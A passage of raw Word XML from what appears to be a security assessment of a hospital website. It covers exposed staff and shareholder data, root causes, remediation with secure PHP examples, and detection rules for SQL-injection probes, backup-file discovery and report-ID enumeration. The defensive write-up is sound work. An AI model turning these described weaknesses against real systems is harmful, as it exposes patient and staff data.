              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Thabo Molefe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>10.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>100,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ordinary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sarah Botha</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>9.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>90,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ordinary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dr. Ahmed Kara</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>80,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Preferential</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Naledi Zulu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>7.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>70,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ordinary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Michael Roberts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>60,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ordinary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dr. Vikram Chetty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>40,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Preferential</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Data minimization analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The exposed staff dataset contains more information than is necessary for the public operation of a hospital website. National identifiers, direct phone numbers and salary values create materially different abuse opportunities from ordinary public contact information. The shareholder table similarly exposes internal ownership information that should not be placed in a public document root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>25. Root-Cause Analysis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Root cause</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Control failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sensitive files stored under the public document root; directory indexing enabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F-01, F-02, F-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Deployment hygiene and web-server access control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dynamic SQL behavior from untrusted authentication input</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F-03, F-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Parameterized queries and production error handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sensitive documents reachable through application object IDs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F-05, F-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Server-side object authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Excessive technology disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Defense-in-depth hardening</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Weak document passwords / legacy PDF protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>M2 supporting evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Document protection policy and password quality</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The recurring theme is inconsistent trust-boundary enforcement. Sensitive information was protected at one layer but left exposed at another: the database backup was logically confidential but physically public; the patient reports were marked encrypted but retrievable after authentication bypass; the database error was internal but rendered to the client. Effective security requires the boundary to hold at every layer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>26. Remediation Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Priority P0 — Restore the two critical trust boundaries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Remove every SQL backup, archive and temporary export from the public document root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Invalidate and rotate any credentials or secrets that may have been stored in exposed files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Replace dynamic authentication SQL with parameterized queries and least-privileged DB access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Invalidate existing patient sessions after remediation and review access logs for suspicious portal activity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Priority P1 — Harden object authorization and error handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Authorize every document request against session identity and record ownership.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Move patient documents outside the web root or behind a dedicated authorization service.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Replace sequential identifiers with opaque references where practical.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Return generic application errors while preserving detailed server-side logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Deny direct web access to log files, backups and source artifacts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Example secure authentication pattern</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="259" w:right="259"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="232323"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>$stmt = $pdo-&gt;prepare('SELECT id, password_hash FROM users WHERE username = ?');</w:t>
        <w:br/>
        <w:t>$stmt-&gt;execute([$username]);</w:t>
        <w:br/>
        <w:t>$user = $stmt-&gt;fetch();</w:t>
        <w:br/>
        <w:br/>
        <w:t>if (!$user || !password_verify($password, $user['password_hash'])) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    http_response_code(401);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    exit('Invalid credentials');</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Example secure document authorization pattern</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="259" w:right="259"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="232323"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>$stmt = $pdo-&gt;prepare(</w:t>
        <w:br/>
        <w:t xml:space="preserve">    'SELECT path FROM reports WHERE id = ? AND patient_id = ?'</w:t>
        <w:br/>
        <w:t>);</w:t>
        <w:br/>
        <w:t>$stmt-&gt;execute([$reportId, $_SESSION['patient_id']]);</w:t>
        <w:br/>
        <w:t>$report = $stmt-&gt;fetch();</w:t>
        <w:br/>
        <w:br/>
        <w:t>if (!$report) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    http_response_code(403);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    exit;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>27. Detection Engineering</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7365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Signal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Detection idea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SQL syntax probes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Alert on repeated quote/comment/boolean-like patterns against authentication endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Investigate source IP, username, response status and session creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Auth bypass pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Alert when a failed login sequence is followed immediately by a portal session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Correlate request body, session ID, timestamp and source IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Backup discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Alert on requests for .sql, .bak, .zip, .old and log filenames</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Block and investigate; confirm no sensitive artifact is public</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Patient report enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Detect sequential report-ID access or unusual request volume</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Review user-to-record authorization and access history</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
